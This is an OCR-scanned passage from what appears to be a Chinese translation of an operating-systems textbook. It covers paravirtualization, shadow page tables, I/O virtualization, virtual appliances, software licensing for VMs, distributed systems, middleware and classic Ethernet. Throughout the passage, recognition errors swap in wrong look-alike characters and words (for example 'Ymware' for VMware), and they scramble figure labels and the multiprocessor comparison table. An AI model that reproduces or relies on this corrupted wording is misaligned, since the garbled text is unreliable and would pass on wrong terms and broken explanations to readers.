程序 应 当 和 短小、 可靠 ， 由 数 千 行 代码 而 不 是 数 百 万 行 代码 组 成 。 这 个 话 
题 已 经 经 过 很 多 学 者 的 讨论 (Hand 等 人 ，2005; Heiser 等 人 ，2006; 





Hohmuth 等 人 ，2004; Roscoe 等 人 ，2007) ào 


全 虚拟 化 准 虚拟 化 


由 于 敏感 指 
令 而 陷入 由 于 管理 程序 
调用 而 陷入 





图 8-27 支持 全 虚拟 化 和 准 虚 拟 化 的 管理 程序 





对 客户 操作 系统 进行 准 虚拟 化 引起 了 很 多 问题 。 第 一 ， 如 果 所 有 的 
敏感 指令 都 被 管理 程序 例 程 所 代 蔡 ， 操 作 系统 如 何在 物理 机 器 上 运行 
呢 ? 毕竟 ， 硬 件 不 可 能 理解 管理 程序 例 程 。 第 二 ， 如 果 市 场 上 有 很 多 种 
管理 程序 ， 例 如 Ymware、 剑 桥 大 学 开发 的 开源 项 目 Xen、 微 软 的 
Viridian， 这 些 管 理 程序 的 API 接 口 不 同 ， 应 该 怎么 办 呢 ? 怎 样 修改 内 核 
使 它 能 够 在 所 有 的 管理 程序 上 运行 ? 








Amsden% A (2006) 提出 了 一 个 解决 方案 。 在 他 们 的 模型 当中 ， 
当 内 核 需 要 执行 一 些 敏感 操作 时 会 转 而 调用 特殊 的 例 程 。 这 些 特殊 的 例 
程 ， 称 作 VMI 〈 虚 拟 机 接口 ) ， 形 成 的 低层 与 便 件 或 管理 程序 进行 交 


互 。 这 些 例 程 被 设计 得 通用 化 ， 不 依赖 于 硬件 或 特定 的 管理 程序 。 


这 种 技术 的 一 个 示例 如 图 8-28 所 示 ， 这 是 一 个 准 虚拟 化 的 Linux 版 
本 ， 称 为 VMI Linux CVMIL) 。 当 VMI Linux 运 行 在 硬件 上 的 时 候 ， 它 
链接 到 一 个 发 射 敏 感 指 令 来 完成 工作 的 函数 库 ， 如 图 8-28a 所 示 。 当 它 
运行 在 管理 程序 上 ， 如 VMware 或 Xen， 客 户 操作 系统 链接 到 男 一 个 函 
数 库 ， 该 函数 库 提 供 对 下 层 管理 程序 的 适当 《或 不 同 ) 例 程 调用 。 通 过 
这 种 方式 ， 操 作 系 统 的 内 核 保 持 了 可 移植 性 和 高 效 性 ， 可 以 适应 不 同 的 
管理 程序 。 













VMI Linux 
VMIL 到 Vmware 的 库 


由 硬件 执行 管理 程序 调用 
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VMIL 到 Xen 的 库 
管理 程序 调用 


VMI Linux 









VMIL 人 硬件 接口 库 









a) b) c) 


图 8-28 VMI Linux 运 行 在 : a) AB TEAR HL; b) VMware; c)Xen_b 





关于 虚拟 机 接口 还 有 很 多 其 他 的 建议 。 其 中 比较 流行 的 一 个 是 
paravirt ops。 它 的 主要 思想 与 我 们 上 面 所 介绍 的 相似 ， 但 是 在 细节 上 有 
所 不 同 。 








8.3.5 ”和 内存 的 虚拟 化 


现在 我 们 已 经 知道 了 如 何 虚 拟 化 处 理 器 。 但 是 一 个 计算 机 系统 不 止 
征 一 个 处 理 器 。 它 还 有 内 存 和 IO 设备 。 它 们 也 需要 虚拟 化 。 让 我 们 来 
看 看 它们 是 如 何 实现 的 。 


几乎 全 部 的 现代 操作 系统 都 文 持 虚 拟 内 存 ， 即 从 虚拟 地 址 空间 到 物 
理 地 址 空间 的 页 面 映 射 。 这 个 映射 由 《多 级 ) 页 表 所 定义 。 通 过 操作 系 
统 设置 处 理 器 中 的 控制 寄存 器 ， 使 之 指 癌 顶级 页 表 ， 从 而 动态 设置 页 面 
上 映射。 虚拟 化 技术 使 得 内 存 管理 更 加 复杂 。 





例如 ， 一 台 虚 拟 机 正在 运行 ， 其 中 的 客户 操作 系统 希望 将 它 的 虚拟 
页 面 7、4、3 分 别 映射 到 物理 页 面 10、11、12。 它 建立 包含 这 种 映射 关 
系 的 页 表 ， 加 载 指向 顶级 页 表 的 硬件 寄存 器 。 这 条 指令 是 敏感 指令 。 在 
支持 VT 技 术 的 处 理 器 上 ， 将 会 引起 陷入 ;在 VMware 管理 程序 上 ， 它 将 
会 调用 VMware 例 程 ; 在 准 虚拟 化 的 客户 操作 系统 中 ， 它 将 会 调用 管理 
程序 调用 。 简 单 地 讲 ， 我 们 假设 它 陷 入 到 了 I 型 管理 程序 中 ， 但 实际 上 
在 上 述 三 种 情况 下 ， 问 题 都 是 相同 的 。 





那么 管理 程序 会 怎么 做 昵 ? 一 种 解决 办 法 是 把 物理 页 面 10、11、12 
分 配给 这 台 虚 拟 机 ， 然 后 建立 真实 的 页 表 使 之 分 别 映射 到 该 虚拟 机 的 虚 
拟 页 面 7、4、3， 随 后 使 用 这 些 页 面 。 到 目前 为 止 还 没有 问题 。 现 在 ， 


假设 第 二 台 虚 拟 机 启动 ， 希 望 把 它 的 虚拟 页 面 4、5、6 分 别 映射 到 物理 
页 面 10、11、12， 并 加 载 指向 页 表 的 控制 寄存 器 。 管 理 程序 捕捉 到 了 这 
次 陷入 ， 但 是 它 会 做 什么 呢 ? 它 不 能 进行 这 次 映射 ， 因 为 物理 页 面 10、 

11、12 正 在 使 用 。 它 可 以 找到 其 他 空闲 页 面 ， 比 如 说 20、21、22 并 使 用 
它们 ， 但 是 在 此 之 前 ， 它 需要 创建 一 个 新 的 页 表 完 成 虚拟 页 面 4、5、6 
到 物理 页 面 20、21、22 的 映射 。 如 果 还 有 其 他 的 虚拟 机 启动 ， 继 续 请 求 
使 用 物理 页 面 10、11、12， 管 理 程序 也 必须 为 它 创建 一 个 映射 。 总 之 ， 
管理 程序 必须 为 每 一 台 虚 拟 机 创建 一 个 影子 页 表 (shadow page 

table) ， 用 以 实现 该 虚拟 机 使 用 的 虚拟 页 面 到 管理 程序 分 配给 它 的 物理 
页 面 之 间 的 映射 。 

















但 更 糟糕 的 是 ， 每 次 客户 操作 系统 改变 它 的 页 表 ， 管 理 程序 必须 相 
应 地 改变 其 影子 页 表 。 例 如 ， 如 果 客 户 操 作 系 统 将 虚拟 页 面 7 重新 映射 
到 它 所 认为 的 物理 页 面 200《〈 不 再 是 物理 页 面 10 了 ) 。 管 理 程序 必须 了 
解 这 种 改变 。 问 题 是 客户 操作 系统 只 需要 写 内 存 就 可 以 完成 这 种 改变 。 
由 于 不 需要 执行 敏感 指令 ， 管 理 程序 根本 惑 不 知道 这 种 改变 ， 所 以 就 不 
会 更 新 它 的 由 实际 硬件 使 用 的 影子 页 表 。 




















一 种 可 能 的 〈 也 很 举 拙 的 ) 解决 方式 是 ， 管 理 程序 监视 客户 虚拟 内 
存 中 保存 顶级 页 表 的 内 存 页 。 只 要 客户 操作 系统 试图 加 载 指 癌 该 内 存 页 
的 硬件 寄存 器 ， 管 理 程序 就 能 获得 相应 的 信息 ， 因 为 这 条 加 载 指令 是 敏 
感 指令 ， 它 会 引发 陷入 。 这 时 ， 管 理 程序 建立 一 个 影子 页 表 ， 把 顶级 页 





表 和 顶级 页 表 所 指 癌 的 二 级 页 表 设 置 成 只 读 。 接 下 来 客户 操作 系统 只 要 
试图 修改 它们 就 会 发 生 缺 页 异 疝 ， 然 后 把 控制 区 给 管理 程序 ， 由 管理 程 
序 来 分 析 指 令 序列 ， 了 解 客户 操作 系统 到 底 要 执行 什么 样 的 操作 ， 并 据 
此 更 新 影子 页 表 。 这 种 方法 并 不 好 ， 但 它 在 理论 上 是 可 行 的 。 





在 这 方面 ， 将 来 的 VT 技术 可 以 通过 人 硬件 实现 两 级 映射 从 而 提供 一 
些 帮 助 。 人 硬件 首先 把 虚拟 页 面 映射 成 客户 操作 系统 所 认为 的 “物理 页 
面 "”， 然 后 再 把 它 〈 人 硬件 仍然 认为 它 是 虚拟 页 面 ) 映射 到 物理 地 址 空 
间 ， 这 样 做 不 会 引起 陷入 。 通 过 这 种 方式 ， 页 表 不 必 再 被 标记 成 只 该， 
而 管理 程序 只 需要 提供 从 客户 的 虚拟 空间 到 物理 空间 的 映射 。 当 虚拟 机 
切换 时 ， 管 理 程序 改变 相应 的 映射 ， 这 与 普通 操作 系统 中 进程 切换 时 系 
统 所 做 的 改变 是 相同 的 。 














在 准 虚拟 化 的 操作 系统 中 ， 人 情况 是 不 同 的 。 这 时 ， 准 虚拟 化 的 客户 
操作 系统 知道 当 它 结束 的 时 候 需 要 更 改进 程 页 表 ， 此 时 它 需 要 通知 管理 
程序 。 所 以 ， 它 首先 彻底 改变 页 表 ， 然 后 调用 管理 程序 例 程 来 通知 管理 
程序 使 用 新 的 页 表 。 这 样 ， 当 且 仅 当 全 部 的 内 容 被 更 新 的 时 候 才 会 进行 
一 次 管理 例 程 调用 ， 而 不 必 每 次 更 新 页 表 的 时 候 都 引发 一 次 保护 故障 ， 
很 明显 ， 效 率 会 高 很 多 。 








8.3.6 ”LO 设备 的 虚拟 化 


了 解 了 处 理 器 和 内 存 的 虚拟 化 ， 下 面 我 们 来 研究 一 下 IO 的 虚拟 
化 。 客 户 操作 系统 在 启动 的 时 候 会 探测 硬件 以 找 出 当前 系统 中 都 连接 了 
哪 种 类 型 的 IO 设备 。 这 些 探 负 会 陷入 到 管理 程序 。 那 么 管理 程序 会 怎 
么 做 呢 ? 一 种 方法 是 同 客 户 操作 系统 报告 设备 信息 ， 如 磁盘 、 打 印 机 等 
真实 存在 的 硬件 。 于 是 客户 操作 系统 加 载 相 应 的 设备 驱动 程序 以 使 用 这 
些 设备 。 当 设备 驱动 程序 试图 进行 WO 操作 时 ， 它 们 会 读 写 设备 的 硬件 
寄存 器 。 这 些 指令 是 敏感 指令 ， 将 会 陷入 到 管理 程序 ， 管 理 程序 根据 需 
要 从 硬件 中 读 取 或 同 硬 件 中 写 入 所 需 的 数据 。 











但 是 ， 现 在 我 们 有 一 个 问题 。 每 一 个 客户 操作 系统 都 认为 它 拥 有 全 
部 的 磁盘 分 区 ， 而 同时 实际 上 虚拟 机 的 数量 比 磁盘 分 区 数 多 得 多 (甚至 
可 能 是 几 百 个 ) 。 第 用 的 解决 方法 是 浓 理 程序 在 物理 磁盘 上 为 每 一 个 虚 
拟 机 创建 一 个 文件 或 区 域 作为 它 的 物理 磁盘 。 由 于 客户 操作 系统 试图 控 
制 真正 的 物理 磁盘 《如 管理 程序 所 见 ) ， 筷 会 把 需要 访问 的 磁盘 块 数 转 
换 成 相对 于 文件 或 区 域 的 偏 移 量 ， 从 而 完成 VO 操作 。 














客户 操作 系统 正在 使 用 的 磁盘 也 许 跟 真实 的 磁盘 不 同 。 例 如 ， 如 采 
真实 的 磁盘 是 带 有 新 接口 的 茶 些 新 品牌 、 高 性 能 的 磁盘 〈 或 RAID) , 
管理 程序 会 告知 客户 操作 系统 它 拥 有 的 是 一 个 旧 的 IDE 磁 盘 ， 证 客户 操 
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程序 将 它们 转换 成 新 磁盘 驱动 的 命令 。 当 硬件 升级 、 软 件 不 做 改动 时 ， 
可 以 使 用 这 种 技术 。 事 实 上 ， 虚 拟 机 对 硬件 设备 重 映 射 的 能 力 证 实 
VM/370 流 行 的 原因 : 公司 想 要 买 更 新 更 快 的 硬件 ， 但 是 不 想 更 改 它们 
的 软件 。 虚 拟 技术 使 这 种 想法 成 为 可 能 








男 一 个 必须 解决 的 VO 问题 是 DMA 技 术 的 应 用 。DMA 技 术 使 用 的 是 
绝对 物理 内 存 地 址 。 我 们 希望 ， 管 理 程序 在 DMA 操 作 开始 之 前 介入 ， 
并 完成 地 址 的 转换 。 不 过 ， 带 有 IO MMU 的 硬件 出 现 了 ， 它 按照 MMU 
虚拟 内 存 的 方式 对 MO 进行 虚拟 化 。 这 个 硬件 解决 了 DMA 引 起 的 问题 。 


另 一 种 处 理 MO 操 作 的 方法 是 让 其 中 一 个 虚拟 机 运行 标准 的 操作 系 
统 ， 并 把 其 他 虚拟 机 的 MO 请 求全 部 反射 给 它 去 处 理 。 当 准 虚拟 化 技术 
得 到 运用 之 后 ， 这 种 方法 被 完善 了 ， 发 送 到 管理 程序 的 命令 只 需 表明 客 
户 操作 系统 需要 什么 〈 如 从 磁盘 1 中 读 取 第 1403 块 ) ， 而 不 必 发 送 一 系 
列 写 磁盘 寄存 器 的 命令 ， 在 这 种 情况 下 ， 管 理 程序 扮演 了 福尔摩斯 的 角 
色 ， 指 出 客户 操作 系统 想 要 做 什么 事情 。Xen 使 用 这 种 方法 处 理 IO 操 
作 ， 其 中 完成 WO 操作 的 虚拟 机 称 为 domain0。 





在 IO 设备 虚拟 化 方面 ，I 型 管理 程序 相对 于 I 型 管理 程序 所 具备 的 
RAET: 窒 主 操作 系统 包含 了 所 有 连接 到 计算 机 上 的 所 有 怪异 的 W/O 
设备 的 驱动 程序 。 当 应 用 程序 试图 访问 一 个 不 常见 的 IO 设备 时 ， 翻 译 
的 代码 可 以 调用 已 存在 的 驱动 程序 来 完成 相应 的 工作 。 但 是 对 I 型 管理 














程序 来 说 ， 它 或 者 自身 包含 相应 的 驱动 程序 ， 或 者 调用 domain0 中 的 驱 
动 程 序 ， 后 一 种 情况 与 特 主 操作 系统 很 相似 。 随 肴 虚拟 技术 的 成 熟 ， 将 
来 的 人 硬件 也 许 会 让 应 用 程序 以 一 种 安全 的 方式 下 接 访 问 人 硬件 ， 这 意味 看 
驱动 程序 可 以 直接 链接 到 应 用 程序 代码 或 者 作为 独立 的 用 户 空 间 服务 ， 
从 而 解决 VO 虚拟 化 方面 的 问题 。 




















8.3.7 ”虚拟 工具 


虚拟 机 为 长 期 困扰 用 户 《 特 别 是 使 用 开源 软件 的 用 户 ) 的 问题 提供 
了 一 种 有 趣 的 解决 方案 : 如 何 安 装 新 的 应 用 程序 。 问 题 在 于 很 多 应 用 程 
序 依赖 于 其 他 的 程序 或 函数 库 ， 而 这 些 程序 和 函数 库 本 号 又 依赖 于 其 他 
的 软件 包 等 等 。 而 且 ， 对 特定 版 本 的 编译 器 、 脚 本 语言 或 操作 系统 也 可 
能 有 依赖 关系 。 





使 用 虚拟 机 技术 ， 一 个 软件 开发 人 员 能 够 仔细 地 创建 一 个 虚拟 机 ， 
装 入 所 需 的 操作 系统 、 编 译 器 、 函 数 库 和 应 用 程序 代码 ， 组 成 一 个 整体 
来 运行 。 这 个 虚拟 机 映像 可 以 被 放 到 光盘 〈CD-ROM) 或 网 站 上 以 供用 
户 安装 或 下 载 。 这 种 方法 意味 着 只 有 软件 开发 者 需要 了 解 所 有 的 依赖 关 
系 。 客 户 得 到 的 是 可 以 正常 工作 的 完整 的 程序 包 ， 独 立 于 他 们 正在 使 用 
的 操作 系统 、 各 类 软件 、 已 安装 的 程序 包 和 函数 库 。 这 些 被 包装 好 的 虚 
拟 机 通常 叫做 虚拟 工具 (virtual appliance) 。 











8.3.8 ”多核 处 理 机 上 的 虚拟 机 


虚拟 机 与 多 核 技 术 的 结合 打开 了 一 个 全 新 的 世界 ， 在 这 个 世界 里 可 
以 在 软件 中 指定 可 用 的 处 理 机 数量 。 例 如 ， 如 果 有 四 个 可 用 的 核 ， 每 个 
核 最 多 可 以 文 持 八 个 虚拟 机 ， 徊 有 需要 ， 一 个 单独 的 〈 梨 面 ) ba a 
可 以 配置 成 32 结 点 的 多 机 系统 ， 但 是 根据 软件 的 需求 ， 它 可 以 有 更 少 的 
处 理 器 。 以 前 ， 对 于 一 个 软件 设计 者 来 说 ， 移 选择 所 需 的 处 理 需 数量 ， 
再 据 此 编写 代码 是 不 可 能 的 。 这 显然 代表 了 计算 技术 发 展 的 新 阶段 。 








虽然 还 不 普 过 ， 但 是 在 虚拟 机 之 间 是 可 能 实现 共 孚 内 存 的 。 所 需要 
完成 的 工作 就 是 将 物理 页 面 映射 到 多 个 虚拟 机 的 地 址 空间 当中 。 如 果 能 
够 做 到 的 话 ， 一 台 计 算 机 就 成 为 了 一 个 虚拟 的 多 处 理 机 。 由 于 多 核心 厂 
上 所 有 的 核 共 人 内 存 ， 因 此 一 个 四 核 蕊 片 能 够 很 容易 地 按照 需要 配置 成 
32 结 点 的 多 处 理 机 或 多 计算 机 系统 。 








多 核 、 虚 拟 机 、 管 理 程序 和 微 内 核 的 结合 将 从 根本 上 改变 人 们 对 计 
算 机 系统 的 认 知 。 现 在 的 软件 不 能 应 对 这 些 想法 : 程序 员 确 定 需要 多 少 
个 处 理 机 ， 这 些 处 理 机 是 应 该 组 成 一 个 多 计算 机 系统 还 是 一 个 多 处 理 
机 ， 以 及 在 东 种 情况 下 最 少 的 内 核 数量 需 求 到 底 是 多 少 。 将 来 的 软件 将 


处 理 这 些 问 题 。 








8.3.9 授权 问题 


大 部 分 软件 是 基于 每 个 处 理 右 授权 的 。 换 句 话说 ， 当 你 购买 了 一 丈 
程序 时 ， 你 只 有 权 在 一 个 处 理 器 上 运行 它 。 这 个 合同 允许 你 在 同一 台 物 
理 机 上 的 多 个 虚拟 机 中 运行 该 软件 吗 ? 在 茶 种 程度 上 ， 很 多 软件 丙 不 知 
道 应 该 怎么 办 。 

如 果 茶 些 公司 获得 授权 可 以 同时 在 n 台 机 右上 运行 软件 ， 问 题 束 会 
更 糟 米 ， 特 别 是 当 虚 拟 机 按照 需要 不 断 产 生 和 消亡 的 时 候 。 

在 某 些 情况 下 ， 软 件 商 在 许可 证 (license〉 中 加 入 明确 的 条 款 ， 禁 


止 在 虚拟 机 或 未 授权 的 虚拟 机 中 使 用 该 软件 。 这 些 限 制 在 法 姓 上 是 否 有 
效 ， 以 及 用 户 对 此 的 反应 还 有 待考 察 。 





8.4 分 布 式 系统 


到 此 为 止 有 关 多 处 理 机 、 多 计算 机 和 虚拟 机 的 讨论 束 结 束 了 ， 现 在 
应 该 转向 最 后 一 种 多 处 理 机 系统 ， 即 分 布 式 系统 distributed 
system) 。 这 些 系统 与 多 计算 机 类 似 ， 每 个 节点 都 有 目 己 的 私有 存储 
器 ， 整 个 系统 中 没有 共享 的 物理 存储 器 。 但 是 ， 分 布 式 系统 与 多 计算 机 
相 比 ， 耦 合 更 加 松散 。 





首先 ， 一 台 多 计算 机 的 节点 通 和 党 有 CPU、RAM、 网 卡 ， 可 能 还 有 
用 于 分 页 的 硬盘 。 与 之 相反 ， 分 布 式 系统 中 的 每 个 节点 都 是 一 台 完 整 的 
计算 机 ， 带 有 全 部 的 外 部 设备 。 其 次 ， 一 台 多 计算 机 的 所 有 节点 一 般 就 
竺 一 个 房间 里 ， 这 样 它们 可 以 通过 专门 的 高 速 网 络 通 信 ， 而 分 布 式 系统 
中 的 节点 则 可 能 分 散在 全 世界 范围 内 。 最 后 ， 一 台 多 计算 机 的 所 有 节点 
运行 同样 的 操作 系统 ， 共 享 一 个 文件 系统 ， 并 处 在 一 个 共同 的 管理 之 
下 ， 而 一 个 分 布 式 系统 的 节点 可 以 运行 不 同 的 操作 系统 ， 每 个 节点 有 自 
己 的 文件 系统 ， 并 且 处 在 不 同 的 管理 之 下 。 一 个 典型 的 多 计算 机 的 例子 
如 一 个 公司 或 一 所 大 学 的 一 个 房间 中 用 于 诸如 药物 建 模 等 工作 的 512 个 
节点 ， 而 一 个 典型 的 分 布 式 系统 包括 了 通过 Internet 松 散 协 作 的 上 千 台 机 
器 。 在 图 8-29 中 ， 对 多 处 理 机 、 多 计算 机 和 分 布 式 系统 就 上 述 各 点 进行 
TER.: 
























































项 目 Se | 多 计算 机 分 布 式 系统 
节点 配置 CPU CPU、RAM、 网 络 接口 | 完整 的 计算 机 
节点 外 设 | 全 部 共享 共享 exc.， 可 能 除了 磁盘 | 每 个 节点 全 套 外 设 
位 置 | 同一 机 箱 同一 房间 | 可 能 全 球 
节点 间 通 信 | 共享 RAM FA Hie 传统 网 络 

| 操作 系统 | 一 个 ,共享 多 个 ， 相 同 | 可 能 都 不 相同 
文件 系统 。 | 一 个 ， 共 享 一 个 ;共享 | 每 个 节点 自 有 
管理 l -个 机 构 -个 机 构 多 个 机 构 














图 8-29 三 类 多 CPU 系统 的 比较 


通过 这 个 表 可 以 清楚 地 看 到 ， 多 计算 机 处 于 中 间 位 置 。 于 是 一 个 有 
趣 的 问题 就 是 :“ 多 计算 机 是 更 像 多 处 理 机 还 是 更 像 分 布 式 系统 ? ”很 奇 
怪 ， 答 案 取决 于 你 的 角度 。 从 技术 角度 来 看 ， 多 处 理 机 有 共 吝 存储 器 而 
其 他 两 类 没有 。 这 个 差别 导致 了 不 同 的 程序 设计 模式 和 不 同 的 思考 方 
式 。 但 是 ， 从 应 用 角度 来 看 ， 多 处 理 机 和 多 计算 机 都 不 过 是 在 机 房 中 的 
大 设备 机 架 Gack) 寺 了 ， 而 在 全 部 依靠 Internet 连 接 计 算 机 的 分 布 式 系 
统 中 显然 通信 要 多 于 计算 ， 并且 以 不 同 的 方式 使 用 大 。 








在 东 种 程度 上 ， 分 布 式 系统 中 计算 机 的 松散 耦合 既是 优点 又 是 缺 
扩 。 它 之 所 以 是 优点 ， 是 因为 这 些 计算 机 可 用 在 各 种 类 型 的 应 用 之 中 ， 
但 它 也 是 缺点 ， 因 为 它 由 于 缺少 共同 的 底层 模型 而 使 得 这 些 应 用 程序 很 
难 编程 实现 。 


典型 的 Pnternet 应 用 有 远程 计算 机 访问 《使 用 telnet、ssh 和 rlogin) 、 
远程 信息 访问 《使 用 万 维 网 (World Wide Web) 和 FTP， 即 文件 传输 协 
议 ) 、 人 际 通信 (使 用 e-mail 和 聊天 程序 ) 以 及 正在 浮现 的 许多 应 用 





例如， 电子 商务 、 远 程 医疗 以 及 远程 教育 等 ) 。 所 有 这 些 应 用 带 来 的 
问题 是 ， 每 个 应 用 都 得 重新 开 及 。 例 如 ，e-mail、FTP 和 万 维 网 基本 上 

都 是 将 文件 从 A 点 移动 到 另 一 个 点 B， 但 是 每 一 种 应 用 都 有 上 自己 的 方式 
从 事 这 项 工作 ， 完 全 按照 自己 的 命名 规则 、 传 输 协 议 、 复 制 技 术 以 及 其 
他 等 。 尽 管 许多 Web 浏 览 右 对 普通 用 户 隐藏 了 这 些 差 别 ， 但 是 砍 层 机 制 
仍然 是 完全 不 同 的 。 在 用 户 界面 级 隐藏 这 些 兰 别 就 像 有 一 个 人 在 一 家 提 
供 全 面 服务 的 旅行 社 的 Web 站 点 中 预订 了 从 纽约 到 旧金山 的 旅行 ， 后 来 
发 现 她 所 购买 的 只 不 过 是 一 张 飞机 票 、 一 张 火车 票 或 者 一 张 汽车 聚 而 

De 








分 布 式 系统 添加 在 其 底层 网 络 上 的 是 一 些 通 用 范 型 〈 模 型 ) EAN 
提供 了 一 种 统一 的 方法 来 观察 整个 系统 。 分 布 式 系统 想 要 做 的 是 ， 将 松 
散 连 接 的 大 量 机 器 转化 为 基于 一 种 概念 的 一 致 系统 。 这 些 范 型 有 的 比较 
简单 ， 而 有 的 是 很 复杂 的 ， 但 是 其 思想 则 总 是 提供 某 些 东西 用 来 统一 整 
个 系统 。 





在 上 下 文 稍 有 差别 的 情形 下 ， 统 一 范例 的 一 个 简单 例子 可 以 在 
UNIX 中 找到 。 在 UNIX 中 ， 所 有 的 IO 设备 被 构造 成 像 文 件 一 样 。 对 键 
盘 、 打 印 机 以 及 串 行 通信 线 等 都 使 用 相同 的 方式 和 相同 的 原 语 进行 操 
作 ， 这 样 ， 与 保持 原 有 概念 上 的 差异 相 比 ， 对 它们 的 处 理 更 为 容易 。 


分 布 式 系统 面 对 不 同 便 件 和 操作 系统 实现 茶 种 统一 性 的 途径 是 ， 在 
操作 系统 的 顶部 添加 一 层 软 件 。 这 层 软 件 称 为 中 间 件 〈middleware) ， 


如 图 8-30 所 示 。 这 层 软件 提供 了 一 些 特定 的 数据 结构 和 操作 ， 从 而 允许 
散布 的 机 器 上 的 进程 和 用 户 用 一 致 的 方式 互 操作 。 


应 用 的 公共 基础 


ml 












































图 8-30 在 分 布 式 系统 中 中 间 件 的 地 位 


在 某 种 意义 上 ， 中 间 件 像 是 分 布 式 系 统 的 操作 系统 。 这 就 是 为 什么 
在 一 本 关于 操作 系统 的 书 中 讨论 中 间 件 的 原因 。 不 过 另 一 方面 ， 中 间 件 
又 不 是 真正 的 操作 系统 ， 所 以 我 们 对 中 间 件 有 关 的 讨论 不 会 过 于 详细 。 
较为 全 面 的 关于 分 布 式 系统 的 讨论 可 参见 《分 布 式 系统 》 (Distributed 
Systems，Tanenbaum 和 van Steen, 2006) 。 在 本 章 余 下 的 部 分 ， 首 先 我 
们 将 快速 考察 在 分 布 式 系 统 〈 下 层 的 计算 机 网 络 ) 中 使 用 的 硬件 ， 然 后 
其 通信 软件 (网 络 协议 ) 。 接 着 我 们 将 考虑 在 这 些 系统 中 的 各 种 范 








KE 
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8.4.1 网 络 硬件 


分 布 式 系统 构建 在 计算 机 网 络 的 上 层 ， 所 以 有 必要 对 计算 机 网 络 这 
个 主题 做 个 简要 的 介绍 。 网 络 主要 有 两 种 ， 履 盖 一 座 建 筑 物 或 一 个 校园 
的 LAN (局 域 网 ，Local Area Networks) 和 可 用 于 城市 、 乡 村 甚至 世界 
范围 的 WAN (广域网 ，Wide Area Network) 。 最 重要 的 LAN 类 型 是 以 
太 网 (Ethernet〉， 所 以 我 们 把 它 作 为 LAN 的 范例 来 考察 。 人 至 于 WAN 的 
例子 ， 我 们 将 考察 Internet， 尽 管 在 技术 上 Internet 不 是 一 个 网 络 ， 而 是 
上 千 个 分 离 网 络 的 联邦 。 但 是 ， 就 我 们 的 目标 而 言 ， 把 Internet 视 为 一 个 
WANIRE T- 





1. 以 太 网 (Ethernet) 


经 典 的 以 太 网 ， 在 IEEE802.3 标 准 中 有 具体 描述 ， 由 用 来 连接 大 干 
计算 机 的 同 轴 电缆 组 成 。 这 些 电缆 之 所 以 称 为 以 太 网 〈Ethernet) ， 是 
源 于 发 光 以 太 ， 人 们 曾经 认为 电磁 辐射 是 通过 以 太 传 播 的 。 〈19 世 纪 英 
国 物理 学 家 James Clerk Maxwell 发 现 了 电磁 辐射 可 用 一 个 波动 方程 描 
述 ， 那 时 科学 家 们 假设 空中 必须 充满 了 某 些 以 太 介 质 ， 而 电磁 辐射 则 在 
该 以 太 介 质 中 传播 。 不 过 在 1887 年 著名 的 Michelson-Morley 实 验 中 ， 科 
学 家 们 并 未 能 探测 到 以 太 的 存在 ， 在 这 之 后 物理 学 家 们 才 意 识 到 电磁 辐 
射 可 以 在 真空 中 传播 ) 。 





在 以 太 网 的 非常 早 的 第 一 个 版 本 中 ， 计 算 机 与 钻 了 半截 筷 的 电 绕 通 
过 一 端 固定 在 这 些 孔 中 而 男 一 端 与 计算 机 连接 的 电线 相连 接 。 它 们 被 称 
为 插入 式 分 接头 〈vampire tap〉， 如 图 8-31a 中 所 示 。 可 是 这 种 接头 很 难 
接 正 确 ， 所 以 没 过 多 久 ， 就 换 用 更 合适 的 接头 了 。 无 论 怎 样 ， 从 电气 上 
来 看 ， 所 有 的 计算 机 都 被 连接 起 来 ， 在 网 络 接口 卡 上 的 电线 仿佛 是 被 焊 
上 一 样 。 


S 
计算 机 


k ai de a 网 
以 太 网 


a) b) 





图 8-31 人 经 典 以 太 网 ; D) 交 换 式 以 太 网 


要 在 以 太 网 上 发送 包 ， 计 算 机 首 移 要 侦 听 电线， 看 看 是 否 有 其 他 的 
计算 机 正在 进行 传输 。 如 果 没 有 ， 这 台 计 算 机 便 开始 传送 一 个 包 ， 其 中 
有 一 个 短 包 头 ， 随 后 是 0 到 1500 字 节 的 有 效 信息 载荷 (payload) 。 如 果 
电线 正在 使 用 中 ， 计 算 机 只 是 等 待 直到 当前 的 传输 结束 ， 接 着 该 台 计 算 
机 开始 发 送 。 

















如 果 两 台 计 算 机 同时 开始 发 送 ， 就 会 导致 冲突 上 肥 生 ， 两 台 机 需 都 做 
检测 。 两 机 都 用 中 断 其 传输 来 啊 应 检测 到 的 碰撞 ， 然 后 在 等 待 一 个 从 0 


到 工 微 秒 的 随机 时 间 段 之 后 ， 再 重新 开始 。 如 果 再 一 次 冲突 发 生 ， 所 有 
碰撞 的 计算 机 进入 0 到 2T 微 秒 的 随机 等 待 。 然 后 再 答 试 。 在 每 个 后 续 的 
冲突 中 ， 最 大 等 待 间 隅 加 倍 ， 用 以 减少 更 多 碰撞 的 机 会 。 这 个 算法 称 为 
二 进 制 指数 补偿 算法 (binary exponential backoff) 。 在 前 面 有 关 减 少 锁 
的 轮 询 开销 中 ， 我 们 曾 介绍 过 这 种 算法 。 











以 太 网 有 其 最 大 电线 长 度 限 制 ， 以 及 可 连接 的 最 多 的 计算 机 人 台数 限 
制 。 要 想 超过 其 中 一 个 的 限制 ， 残 要 在 一 座 大 建筑 物 或 校园 中 连接 多 个 
以 太 网 ， 然 后 用 一 种 称 为 桥接 器 ridge) 的 设备 把 这 些 以 太 网 连接 起 
来 。 桥 接 句 允许 信息 从 一 个 以 太 网 传递 到 另 一 个 以 太 网 ， 而 源 在 桥接 器 
的 一 边 ， 目 的 地 在 桥接 器 的 男 一 边 。 


为 了 避免 磁 撞 问题 ， 现 代 以 太 网 使 用 交换 机 (switch〉， 如 图 8-31b 
所 示 。 每 个 交换 机 有 若干 个 端口 ， 一 个 端口 用 于 连接 一 台 计 算 机 、 一 个 
以 太 网 或 另 一 个 交换 机 。 当 一 个 包 成 功 地 避 开 所 有 的 碰撞 并 到 达 交 换 机 
时 ， 它 被 缓存 在 交换 机 中 并 送 往 另 一 个 通 往 目 的 地 机 器 的 端口 。 知 能 忍 
受 较 大 的 交换 机 成 本 ， 可 以 使 每 台 机 器 都 拥有 自己 的 端口 ， 从 而 消除 掉 
所 有 的 碰撞 。 作 为 一 种 妥协 方案 ， 在 每 个 端口 上 连接 少量 的 计算 机 还 是 
有 可 能 的 。 在 图 8-31b 中 ， 一 个 经 典 的 由 多 个 计算 机 组 成 以 太 网 连接 到 
交换 机 的 一 个 端口 中 ， 这 个 以 太 网 中 的 计算 机 通过 插入 式 分 接头 连接 在 
电缆 上 。 


2. 因 特 网 


Internet 由 ARPANET 《美国 国防 部 高 级 研究 项 目 普 资助 的 一 个 实验 
